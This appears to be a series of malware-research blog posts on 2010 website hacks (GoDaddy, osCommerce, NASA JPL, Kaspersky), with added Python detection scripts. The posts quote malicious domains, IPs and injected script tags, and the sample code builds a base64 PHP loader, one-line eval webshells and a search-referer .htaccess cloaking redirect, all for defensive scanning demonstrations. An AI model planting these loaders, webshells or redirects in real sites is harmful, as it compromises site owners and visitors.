Attacks on GoDaddy sites – insomniaboldinfoorg.com

UPDATE: As of 4AM Pacific, on November 3rd, we’ve received various reports of another related outbreak of exploited sites on GoDaddy. We’re currently researching the issue and will provide updated scripts if necessary. Please comment below if you have been affected, or if you have any information on the exploit.


Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using insomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll.php?k=1

www3.hope-soft57.net
www3.new-protectionsoft23.in
www4.free-pc-protection9.in

http://insomniaboldinfocom.com/mm.php

http://insomniaboldinfonet.com/mm.php

www3.large-defense1.in



Hilary Kneber at it again: voip.dialistico.net

The Hilary Kneber group is at it again. We are now tracking their usage of voip.dialistico.net to push malware to quite a few sites. If you don’t know about them, just take a look at our blog history. Most of the mass attacks we posted were controlled and created by them.

All the infected sites have this malware:

<script src="http://voip.dialistico.net/products/voip.php"..

This tag is generated by a large string of encoded PHP added to every file in the site. If your site got hacked, we have a cleanup solution here: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html. Some details are here too: MW:GDD:3.

The above code loads malware from www4.pc-guard-soft6.net, which is hosted at 69.57.173.221 (from unique-protection.com – famous fake AV site).

And the whois for dialistico.net:

Domain name: dialistico.net
Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The domain is hosted at 77.78.239.53, which was also the home of these recent attacks:

myblindstudioinfoonline.com
meqashoppercom.com
insomniaboldinfocom.com
voip.dialistico.net

We will post more details when we get them.


Is your site hacked? Visit http://sucuri.net and we will clean up the mess for you.

Malware update: ssl-verification.net

Quick malware update: The site ssl-verification.net (nice name) is being used to distribute SEO spam and malware (the famous fake AV). We recently wrote about the domain ssl-validation, but it seems that they disabled it and are using ssl-verification instead now.

You can get details of the code being used here: 7ea73e3ac775b52b945d5b45a5abb7ad and b99003ddc4a4815bb82a39cc6af3b452

All the infected sites so far had an encoded piece of PHP code inside their index.php or footer.php (if using WordPress) and a backdoor inside a random PHP file. We found the backdoor and, by analyzing the logs, we could identify the C&C IP address: 41.190.16.17.

41.190.16.17 - - [20/Oct/2010:03:35:21 -0700] "GET /img/readthat.php HTTP/1.1" 200 11204 "http://phlks.com/doors/check_all.pl?5" "Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10"

What is interesting is that it seems the attackers are using http://phlks.com/doors/check_all.pl to manage their network of infected sites and according to Google, they have more than 4k sites under their control.

The malicious site is hosted at 85.17.213.243, so a suggestion for hosting companies: block this IP.
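The backdoor above was found by reading the access logs: a PHP script answering with 200 from a directory that should only hold images, requested from a single IP with a Referer pointing at the attackers' management panel. The following is an added example (not Sucuri's tooling) of the same hunt over a combined-format log. The first sample line is the request quoted in the post; the other lines, the list of static-only directories, and the known-script allow-list are constructed assumptions to adjust per site.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Directories that should only ever serve static assets. A PHP script answering
# with 200 from one of them is a strong webshell indicator (assumption: tune per site).
STATIC_DIRS = ("/img/", "/images/", "/uploads/", "/js/", "/css/", "/cache/")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["target"].split("?", 1)[0]   # drop the query string
    rec["status"] = int(rec["status"])
    return rec


def referer_host(referer):
    """Host part of the Referer header, or '' for '-' / empty."""
    if not referer or referer == "-":
        return ""
    return urlsplit(referer).hostname or ""


def find_backdoor_hits(lines, known_scripts=frozenset()):
    """Group successful PHP requests in static-only directories by script path."""
    hits = defaultdict(lambda: {"hits": 0, "ips": set(), "referers": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 200:
            continue            # malformed, or never executed (404/403/500)
        path = rec["path"]
        if not path.lower().endswith(".php") or path in known_scripts:
            continue
        if not any(d in path for d in STATIC_DIRS):
            continue
        entry = hits[path]
        entry["hits"] += 1
        entry["ips"].add(rec["ip"])
        host = referer_host(rec["referer"])
        if host:
            entry["referers"].add(host)
    return dict(hits)


# Constructed sample log. Line 1 is the request quoted in the post; the rest are
# made up to show what is and is not flagged (normal traffic, a static file, a 404).
SAMPLE_LOG = """\
41.190.16.17 - - [20/Oct/2010:03:35:21 -0700] "GET /img/readthat.php HTTP/1.1" 200 11204 "http://phlks.com/doors/check_all.pl?5" "Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10"
41.190.16.17 - - [20/Oct/2010:03:36:02 -0700] "POST /img/readthat.php?cmd=ls HTTP/1.1" 200 512 "http://phlks.com/doors/check_all.pl?5" "Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10"
10.0.0.5 - - [20/Oct/2010:03:40:10 -0700] "GET /index.php?p=2 HTTP/1.1" 200 8120 "http://www.google.com/search?q=example" "Mozilla/5.0"
10.0.0.6 - - [20/Oct/2010:03:41:00 -0700] "GET /img/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [20/Oct/2010:03:42:00 -0700] "GET /uploads/shell.php HTTP/1.1" 404 210 "-" "curl/7.19.7"
"""

if __name__ == "__main__":
    for path, info in find_backdoor_hits(SAMPLE_LOG.splitlines()).items():
        print(path, info["hits"], sorted(info["ips"]), sorted(info["referers"]))
```

Only /img/readthat.php comes out, with the single client IP and the phlks.com referer, which is exactly the pivot used in the post: the referer gives you the attackers' panel, the IP gives you something to block and to search for across other hosts. The 404 for /uploads/shell.php is deliberately ignored, since a script that never executed is a probe, not a backdoor.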


Having issues with malware? Sign up at http://sucuri.net and we will get it all sorted out.

More attacks – Hilary Kneber and insomniaboldinfocom.com

For the last couple of days, we've been seeing a good number of sites hacked with a familiar pattern. All of them have JavaScript loading malware (the famous fake AV) from:

http://insomniaboldinfocom.com/mm.php

http://insomniaboldinfonet.com/mm.php

http://www3.large-defense1.in

This is very similar to the GoDaddy attack of a few weeks ago, but this time it’s affecting other hosting providers.

All the sites we’ve seen so far have the following code added to all PHP files:

eval(base64_decode("aWYoZnVuY3Rpb....

What is interesting is that this domain is hosted at 77.78.239.53, which was used in previous attacks by the "Hilary Kneber" group, so we think they are all related (even though this domain wasn't registered in their name).
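Both this attack (an eval(base64_decode(...)) prepended to every PHP file) and the voip.dialistico.net one above (a script tag pointing at an external host) can be picked up by a simple tree walk. The scanner below is an added example, not Sucuri's scanner or code from the posts. It decodes the base64 blob just far enough to show what it would run, and flags script tags whose host is not on an allow-list; the allow-list, the scanned extensions, and the sample web root it builds are assumptions for the demonstration. Note that the fragment quoted in the post, aWYoZnVuY3Rpb, decodes to if(functi, so the injected code starts with a function_exists-style guard.

```python
import base64
import os
import re
import tempfile

# Patterns for the two injections described in the posts.
EVAL_B64 = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)', re.I)
SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']?((?:https?:)?//([^/"\'\s>]+)[^"\'\s>]*)', re.I)

# Hosts this site legitimately loads scripts from (assumption; tailor per site).
ALLOWED_SCRIPT_HOSTS = {"ajax.googleapis.com"}
SCAN_EXT = {".php", ".html", ".htm", ".js", ".inc"}


def decode_preview(b64, limit=40):
    """Decode the start of a base64 blob, tolerating a truncated tail."""
    cut = b64[: len(b64) - len(b64) % 4]        # drop an incomplete trailing quartet
    try:
        raw = base64.b64decode(cut)
    except ValueError:
        return ""
    return raw[:limit].decode("latin-1")


def scan_text(text):
    """Return (kind, detail) findings for one file's content."""
    findings = []
    for m in EVAL_B64.finditer(text):
        findings.append(("eval_base64", decode_preview(m.group(1))))
    for m in SCRIPT_SRC.finditer(text):
        if m.group(2).lower() not in ALLOWED_SCRIPT_HOSTS:
            findings.append(("external_script", m.group(1)))
    return findings


def find_injections(root):
    """Walk a web root and return sorted (relative path, kind, detail) findings."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1") as fh:   # never fails on odd bytes
                for kind, detail in scan_text(fh.read()):
                    results.append((os.path.relpath(path, root).replace(os.sep, "/"), kind, detail))
    return sorted(results)


def build_sample_site():
    """Constructed sample web root; the infected files mimic the injections
    described in the posts (this is not a real capture)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    payload = base64.b64encode(
        b"if(function_exists('curl_init')){echo '<script src=\"http://insomniaboldinfocom.com/mm.php\"></script>';}"
    ).decode()
    files = {
        "index.php": '<?php eval(base64_decode("%s")); ?>\n<?php include "header.php"; ?>\n' % payload,
        "header.php": '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>\n',
        "footer.php": '</div>\n<script src="http://voip.dialistico.net/products/voip.php"></script>\n</body>\n',
        "js/app.js": 'document.title = "ok";\n',
    }
    for rel, text in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(text)
    return root


if __name__ == "__main__":
    for rel, kind, detail in find_injections(build_sample_site()):
        print(rel, kind, detail)
```

The decoded preview is what makes the eval finding actionable: a legitimate obfuscated plugin and an injected loader both match the regex, but only one starts with code that emits a script tag for a remote .php. Treat any external_script host you do not recognise as hostile until you have looked it up, as the posts do with whois and hosting IP.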


NASA web site hacked and serving malware/spam

Some sites under NASA's Jet Propulsion Laboratory ( http://jpl.nasa.gov/ ) have been hacked and are being used in the infamous blackhat SEO spam network. Not only that, they are also serving malware to unsuspecting users.

The sites in question are http://ki.jpl.nasa.gov/, http://aviris.jpl.nasa.gov/ and a few others. Most of these malicious pages are well hidden in the site, for example at http://aviris.jpl.nasa.gov/cgi/ch/.cache/levitra-drug-impotence:

(screenshot: NASA with spam)

You can also search on Google for "cialis canada inurl:nasa.gov" to find a few more infected pages and sites:


Kaspersky site hacked and redirecting users to fake AV

If you tried to download from and/or visit Kaspersky's web site yesterday, please check that your computer did not get infected. Their web site was hacked and their download pages were redirecting users to a fake AV (malware) page.

The malware was getting loaded from http://77.78.246.143, which is already blacklisted by Google:

Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, 77.78.246.0 appeared to function as an intermediary for the infection of 46 site(s) including mygidoctors.com/, bruyereu.eu/, bitterpiecomix.com/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1941 domain(s), including franchesco.kwik.to/, soloingenieria.net/, marchex.com/.

Users are complaining about it in their forums, but Kaspersky has not released an official statement about it:

http://forum.kaspersky.com/index.php?showtopic=189198
http://www.calendarofupdates.com/updates/index.php?showtopic=32851

Update: Kaspersky confirmed the incident to itpro.co.uk: http://www.itpro.co.uk/627817/updated-kaspersky-hit-by-cyber-criminals

It shows that even security companies are not immune to these types of attacks. Hopefully they will post an update soon.

Rail Europe trying to sell me Amoxicillin – Pharma hack

I was looking to buy some Amoxicillin online today and didn't want to get a prescription. So I went to Google and searched for it. Interestingly enough, Rail Europe ( http://blog.raileurope.com ) was the first result.

Ok, so I’m kidding, I was not searching for Amoxicillin. I was however being truthful about Rail Europe being hacked with the infamous Blackhat SEO Spam (pharma) technique.

Infecting sites with ads for medicine to treat infections, how awesome is that?

(screenshot: Pharma hack)


osCommerce attacks – kirm-sky.ru

We are seeing a very large number of osCommerce sites hacked in the last few days. If you are an osCommerce user, make sure to update it ASAP and check whether it has been infected (also remove file_manager.php from the admin directory).

These attacks seem to be using the same vulnerability used in previous attacks (nt02.co.in, nt04.in, etc).

The latest version consists of the following:

1. .htaccess is modified to redirect users to kirm-sky.ru, voice-nano.ru, devisionnetwork.ru, etc (the first domain alone appears on more than 600 infected sites according to Google).

This is what the .htaccess looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
..
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]

2. A backdoor is created inside /js/conf.php and another one at /flops.php. Make sure to remove these and search for other PHP files that are not part of the official osCommerce distribution.

3. Blackhat SEO spam is added to includes/application_bottom.php.
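The three steps above map onto two checks a store owner can script: does .htaccess contain a RewriteRule that only fires on a search-engine Referer and sends the visitor to another host, and which PHP files are either not in the osCommerce distribution or differ from the shipped copy. The code below is an added example and not Sucuri's or osCommerce's own tooling. The site host, the sample .htaccess (the page's snippet with its ".." filled in with a made-up fourth condition), and the tiny two-file "manifest" of clean hashes are constructed assumptions; a real manifest would be built from a pristine copy of the same osCommerce release.

```python
import hashlib
import os
import re
import tempfile
from urllib.parse import urlsplit

SITE_HOST = "shop.example.com"          # the store's own host (assumption)

REWRITE_COND = re.compile(r'^\s*RewriteCond\s+(\S+)\s+(\S+)', re.I)
REWRITE_RULE = re.compile(r'^\s*RewriteRule\s+(\S+)\s+(\S+)', re.I)


def find_referer_redirects(htaccess):
    """Return (referer_patterns, target) for every RewriteRule that is gated on
    %{HTTP_REFERER} and redirects to a host other than SITE_HOST: the cloaking
    pattern in the attack above."""
    findings, conds = [], []
    for line in htaccess.splitlines():
        if line.lstrip().startswith("#"):
            continue
        c = REWRITE_COND.match(line)
        if c:
            conds.append((c.group(1), c.group(2)))
            continue
        r = REWRITE_RULE.match(line)
        if not r:
            continue
        target = r.group(2)
        referer_pats = [p for var, p in conds if var.upper() == "%{HTTP_REFERER}"]
        conds = []                       # RewriteCond lines only apply to the next rule
        host = urlsplit(target).hostname if "://" in target else None
        if referer_pats and host and host.lower() != SITE_HOST:
            findings.append((referer_pats, target))
    return findings


def sha256_file(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def audit_php_files(root, manifest):
    """manifest: {relative path: sha256 of the clean file}. Returns PHP files that
    are not in the distribution and shipped files whose content has changed."""
    unexpected, modified = [], []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel not in manifest:
                unexpected.append(rel)
            elif sha256_file(full) != manifest[rel]:
                modified.append(rel)
    return sorted(unexpected), sorted(modified)


# Constructed sample .htaccess: one legitimate canonical-host redirect, one pretty-URL
# rule, then the injected search-engine cloak modelled on the snippet in the post.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\\.com$ [NC]
RewriteRule ^(.*)$ http://shop.example.com/$1 [R=301,L]
RewriteRule ^product/([0-9]+)$ product_info.php?products_id=$1 [L]
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]
"""

# Constructed sample store: two shipped files (one with spam appended) plus the two
# backdoor paths named in the post. Contents are placeholders, not real osCommerce code.
CLEAN = {
    "index.php": b"<?php require('includes/application_top.php'); ?>\n",
    "includes/application_bottom.php": b"<?php ob_end_flush(); ?>\n",
}
MANIFEST = {p: hashlib.sha256(c).hexdigest() for p, c in CLEAN.items()}
INFECTED = dict(CLEAN)
INFECTED["includes/application_bottom.php"] += b'<div style="display:none">cheap pills</div>\n'
INFECTED["js/conf.php"] = b"<?php eval($_POST['c']); ?>\n"
INFECTED["flops.php"] = b"<?php eval($_POST['c']); ?>\n"


def build_sample_store():
    root = tempfile.mkdtemp(prefix="oscommerce_")
    for rel, content in INFECTED.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    print(find_referer_redirects(SAMPLE_HTACCESS))
    print(audit_php_files(build_sample_store(), MANIFEST))
```

Only the devisionnetwork.ru rule is reported; the canonical-host redirect goes to SITE_HOST and the pretty-URL rule has no Referer condition, so neither is a false positive. The hash audit lists js/conf.php and flops.php as unexpected and application_bottom.php as modified, which is the triage order you want: delete what was never shipped, then diff what was.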


All the domains used in this attack are hosted at 91.204.48.37:

kirm-ar.ru
kirmar.ru
classwoods.ru
enterteiment-wizrd.ru
class-woods.ru
relax-july.ru
ar-kirm.ru
enterteimentwizrd.ru
tecros.ru
tutaanti.ru
kirm-sky.ru
sky-ar.ru
devisionnetwork.ru
voice-nano.ru

This is how our malware scanner detects an infected site:

(screenshot: OsCommerce hacked, as reported by the Sucuri malware scanner)

We will post more details as we learn more about it. This link gives some good tips on how to secure osCommerce.


If your site is hacked and you need help, contact us a support@sucuri.net or http://sucuri.net

More attacks – Hilary Kneber and meqashoppecom – Part II

A few days ago we reported a large-scale attack affecting WordPress sites hosted on 123-reg servers. The attackers were using the domains meqashopperinfo.com and meqashopperonline.com to spread the malware. You can read more about it here.

Today, we’re seeing a small variation of this attack. We’re continuing our research, but it seems the attack has spread to another host, and maybe more. The attackers are using meqashoppercom.com to spread the malware and the following javascript gets added to the affected sites (result from our scanner):



EA.com – Please protect your forum or shut it down

A note to EA.com: Please protect your forums or shut it down.

Not only are more than half of the posts on http://forum.ea.com serving spam, the forum is also being used as a link target in the spam injected into other web sites. More often than not, when a site gets hacked with SEO spam, we see links like this one (pointing to EA.com):

purchasing viagra overnight – Tramadol and pregnancy (http://forum.ea.com/eaforum/posts/list/2080837.page)

The main page of the forum is all serving spam (see the recent posts tab):
